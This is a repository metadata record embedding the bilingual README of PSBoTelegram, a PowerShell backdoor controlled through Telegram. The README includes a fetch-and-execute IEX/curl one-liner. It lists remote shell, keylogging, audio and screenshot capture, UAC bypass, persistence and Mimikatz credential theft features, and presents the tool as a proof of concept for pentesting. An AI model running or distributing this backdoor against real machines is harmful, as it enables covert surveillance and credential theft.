{"id":28354120,"url":"https://github.com/hackplayers/psbotelegram","last_synced_at":"2025-06-12T01:33:05.178Z","repository":{"id":44400926,"uuid":"79934657","full_name":"Hackplayers/PSBoTelegram","owner":"Hackplayers","description":"Backdoor en powershell vía Telegram","archived":false,"fork":false,"pushed_at":"2017-03-30T10:38:15.000Z","size":2139,"stargazers_count":30,"open_issues_count":0,"forks_count":16,"subscribers_count":9,"default_branch":"master","last_synced_at":"2025-06-04T08:44:47.214Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Hackplayers.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2017-01-24T17:19:35.000Z","updated_at":"2025-02-05T09:13:59.000Z","dependencies_parsed_at":"2022-07-15T04:30:59.733Z","dependency_job_id":null,"html_url":"https://github.com/Hackplayers/PSBoTelegram","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/Hackplayers/PSBoTelegram","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Hackplayers%2FPSBoTelegram","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Hackplayers%2FPSBoTelegram/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Hackplayers%2FPSBoTelegram/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Hackplayers%2FPSBoTelegram/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Hackplayers","download_url":"https://codeload.github.com/Hackplayers/PSBoTelegram/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Hackplayers%2FPSBoTelegram/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":259377013,"owners_count":22848267,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2025-05-28T02:10:39.000Z","updated_at":"2025-06-12T01:33:05.168Z","avatar_url":"https://github.com/Hackplayers.png","language":"PowerShell","funding_links":[],"categories":[],"sub_categories":[],"readme":"\n\n# PsBoTelegram\nBackdoor using Telegram and Powershell. Por favor, usad sólo vuestros equipos para las pruebas.  \nNo me hago responsable de un mal uso del software. Rercordad que esto sólo es una prueba de concepto.  \n\nPodeis probar el script abriendo una consola de powershell y ejecutando este comando:\n\n**IEX (curl \"https://raw.githubusercontent.com/Hackplayers/PSBoTelegram/master/PSBoTelegram.ps1\" ).content**\u0026nbsp;\u0026nbsp;\n\n        ____  _____ ____      ______     __\n       / __ \\/ ___// __ )____/_  __/__  / /__   ____ __________ _____ __\n      / /_/ /\\__ \\/ __  / __ \\/ / / _ \\/ / _ \\/ __  / ___/ __  / __  __ \\\n     / ____/___/ / /_/ / /_/ / / /  __/ /  __/ /_/ / /  / /_/ / / / / / /\n    /_/    /____/_____/\\____/_/  \\___/_/\\___/\\__, /_/   \\__,_/_/ /_/ /_/\n                                            /____/\n\n                                                     v0.8 by CyberVaca @ HackPlayers\n\nPSBotTelegram es un script escrito en Powershell, que nos crea una backdoor que se conecta a un BOT de Telegram. El BOT se controlará por mensajes de Telegram. Al ejecutar el script nos va a pedir tres datos necesarios para crear el shellcode. \n\n# Instalación en Linux\n\n    git clone https://github.com/hackplayers/psbotelegram.git\n    cd psbotelegram\n    sudo apt-get update \u003e /dev/null\n    sudo apt-get install libunwind8 libicu55 \n    wget https://github.com/PowerShell/PowerShell/releases/download/v6.0.0-alpha.13/powershell_6.0.0-alpha.13-1ubuntu1.16.04.1_amd64.deb\n    sudo dpkg -i powershell_6.0.0-alpha.13-1ubuntu1.16.04.1_amd64.deb\n    powershell ./PSBoTelegram.ps1\n\n# Instalación en Windows\n\n    Powershell.exe ./PSBotelegram.ps1\n    \nLos datos que nos pide son los siguientes:  \n\n# Parametros\n![Parametros](./images/parametros.png)  \n \n**[+] Introduzca el Token del Bot de Telegram:** \"Aquí deberemos poner el Token del bot que hayamos creado.\"  \n**[+] Introduzca su Chat ID:** \"Aquí deberemos poner nuestro ID de Telegram.\"  \n**[+] Introduzca el delay para la conexión:** \"En este campo seteamos el delay(retardo) entre en pc con el backdoor y nuestro chat de telegram\"   \n\n# Salidas de archivo:\n![Salidas](./images/OutFiles.png)  \n\nUna vez introducido estos datos, nos creará un shellcode en BASE64 en un tipo de archivo seleccionado para ejecutarlo en el equipo a auditar.  \n\n# Funciones del backdoor.\n\n[1]\u0026nbsp;\u0026nbsp;\u0026nbsp;**/Help**\u0026nbsp;\u0026nbsp; (Nos muestra la ayuda)  \n[2]\u0026nbsp;\u0026nbsp;\u0026nbsp;**/Info**\u0026nbsp;\u0026nbsp; (Devuelve información sobre el equipo)   \n[3]\u0026nbsp;\u0026nbsp;\u0026nbsp;**/Shell**\u0026nbsp;\u0026nbsp; (/Shell + CmdLet a ejecutar )  \n[4]\u0026nbsp;\u0026nbsp;\u0026nbsp;**/Whoami**\u0026nbsp;\u0026nbsp; (Devuelve el usuario que ejecutó el codigo)  \n[5]\u0026nbsp;\u0026nbsp;\u0026nbsp;**/Ippublic**\u0026nbsp;\u0026nbsp; (Nos da IP publica, Pais y Ciudad del Target)  \n[6]\u0026nbsp;\u0026nbsp;\u0026nbsp;**/Kill**\u0026nbsp;\u0026nbsp; (Mata el backdoor)  \n[7]\u0026nbsp;\u0026nbsp;\u0026nbsp;**/Scriptimport**\u0026nbsp;\u0026nbsp; (Importa el script de powershell pasandole una url)  \n[8]\u0026nbsp;\u0026nbsp;\u0026nbsp;**/Shell nc (netcat)**\u0026nbsp;\u0026nbsp; (Función de powercat https://github.com/besimorhino/powercat\n)  \n[9]\u0026nbsp;\u0026nbsp;\u0026nbsp;**/Download**\u0026nbsp;\u0026nbsp; (Download mas ruta nos descarga el archivo)  \n[10]\u0026nbsp;\u0026nbsp;**/Screenshot**\u0026nbsp;\u0026nbsp; (Realiza screenshot y nos lo envia)  \n[11]\u0026nbsp;\u0026nbsp;**/Audio**\u0026nbsp;\u0026nbsp; (/Audio X, Grabaría X segundos de audio y nos lo envia)  \n[12]\u0026nbsp;\u0026nbsp;**/BypassUAC**\u0026nbsp;\u0026nbsp; (Ejecuta el Bot con privilegios administrativos)  \n[13]\u0026nbsp;\u0026nbsp;**/Persistence**\u0026nbsp;\u0026nbsp; (/Persistence ON/OFF)  \n[14]\u0026nbsp;\u0026nbsp;**/MimiGatoz**\u0026nbsp;\u0026nbsp; (Ejecuta Mimikatz modificado para el bypass AV y nos envia los datos)  \n[15]\u0026nbsp;\u0026nbsp;**/Keylogger-Selective**\u0026nbsp;\u0026nbsp; (Ejecuta un Keylogger selectivo, ejemplo /keylogger-Selective Facebook)  \n[16]\u0026nbsp;\u0026nbsp;**/Mimikittenz**\u0026nbsp;\u0026nbsp; (Ejecuta Mimikittenz, comprobando si el equipo es vulnerable y si no lo es, lo hace vulnerable... )  \n\n\n# PsBoTelegram English \nBackdoor using Telegram and Powershell. Please use only your test equipment.\nI am not responsible for any misuse of the software. Make sure this is only a proof of concept. \n\nYou can test the script by opening a powershell console and running this command:\n\n**IEX (curl \"https://raw.githubusercontent.com/Hackplayers/PSBoTelegram/master/PSBoTelegram.ps1\" ).content**\u0026nbsp;\u0026nbsp;\n\n\n        ____  _____ ____      ______     __\n       / __ \\/ ___// __ )____/_  __/__  / /__   ____ __________ _____ __\n      / /_/ /\\__ \\/ __  / __ \\/ / / _ \\/ / _ \\/ __  / ___/ __  / __  __ \\\n     / ____/___/ / /_/ / /_/ / / /  __/ /  __/ /_/ / /  / /_/ / / / / / /\n    /_/    /____/_____/\\____/_/  \\___/_/\\___/\\__, /_/   \\__,_/_/ /_/ /_/\n                                            /____/\n\n                                                     v0.8 by CyberVaca @ HackPlayers\n\nPSBotTelegram is a script written in Powershell, which creates a backdoor that connects to a Telegram BOT. The BOT will be controlled by Telegram messages. When executing the script we will ask for three data needed to create the shellcode.\n\n# Install in Linux\n\n    git clone https://github.com/hackplayers/psbotelegram.git\n    cd psbotelegram\n    sudo apt-get update \u003e /dev/null\n    sudo apt-get install libunwind8 libicu55 \n    wget https://github.com/PowerShell/PowerShell/releases/download/v6.0.0-alpha.13/powershell_6.0.0-alpha.13-1ubuntu1.16.04.1_amd64.deb\n    sudo dpkg -i powershell_6.0.0-alpha.13-1ubuntu1.16.04.1_amd64.deb\n    powershell ./PSBoTelegram.ps1\n\n# Install in Windows\n\n    Powershell.exe ./PSBotelegram.ps1\n    \nThe data that asks us are the following:\n\n# Parametres\n![Parametros](./images/parametros.png)  \n \n**[+] Enter the Telegram Bot Token:** \"Here we have to put the Token of the bot we have created.\"  \n**[+] Enter your Chat ID:** \"Here we have to put our Telegram ID.\"  \n**[+] Enter the delay for the connection:** \"In this field we set the delay between pc in the backdoor and our telegram chat\"   \n\n# Backdoor functions\n\n[1]\u0026nbsp;\u0026nbsp;\u0026nbsp;**/Help** (Show us the help)  \n[2]\u0026nbsp;\u0026nbsp;\u0026nbsp;**/Info** (Returns information about the equipment)  \n[3]\u0026nbsp;\u0026nbsp;\u0026nbsp;**/Shell** (/ Shell + CmdLet to run)  \n[4]\u0026nbsp;\u0026nbsp;\u0026nbsp;**/Whoami** (Returns the user who ran the code)  \n[5]\u0026nbsp;\u0026nbsp;\u0026nbsp;**/Ippublic** (We give IP publica, Country and Target City)  \n[6]\u0026nbsp;\u0026nbsp;\u0026nbsp;**/Kill** (Kill the backdoor)  \n[7]\u0026nbsp;\u0026nbsp;\u0026nbsp;**/Scriptimport** (Import the powershell script by passing it a url)  \n[8]\u0026nbsp;\u0026nbsp;\u0026nbsp;**/Shell nc (netcat)** (Powercat function https://github.com/besimorhino/powercat)  \n[9]\u0026nbsp;\u0026nbsp;\u0026nbsp;**/Download** (Download more path to download the file)  \n[10]\u0026nbsp;\u0026nbsp;\u0026nbsp;**/Screenshot** (Make screenshot and send it to us)  \n[11]\u0026nbsp;\u0026nbsp;\u0026nbsp;**/Audio** (/Audio X, Record X seconds of audio and send it to us)  \n[12]\u0026nbsp;\u0026nbsp;\u0026nbsp;**/BypassUAC** (Runs the bot with administrative privileges)  \n[13]\u0026nbsp;\u0026nbsp;\u0026nbsp;**/Persistence** (/ Persistence ON / OFF)  \n[14]\u0026nbsp;\u0026nbsp;\u0026nbsp;**/MimiGatoz** (Run modified Mimikatz for AV bypass and send us the data)  \n[15]\u0026nbsp;\u0026nbsp;\u0026nbsp;**/Keylogger-Selective** (Executes a Selective Keylogger, example /keylogger-Selective Facebook)  \n[16]\u0026nbsp;\u0026nbsp;\u0026nbsp;**/Mimikittenz** (Mimikittenz runs, checking if the computer is vulnerable and if it is not, it makes it vulnerable ...)  \n\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhackplayers%2Fpsbotelegram","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fhackplayers%2Fpsbotelegram","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhackplayers%2Fpsbotelegram/lists"}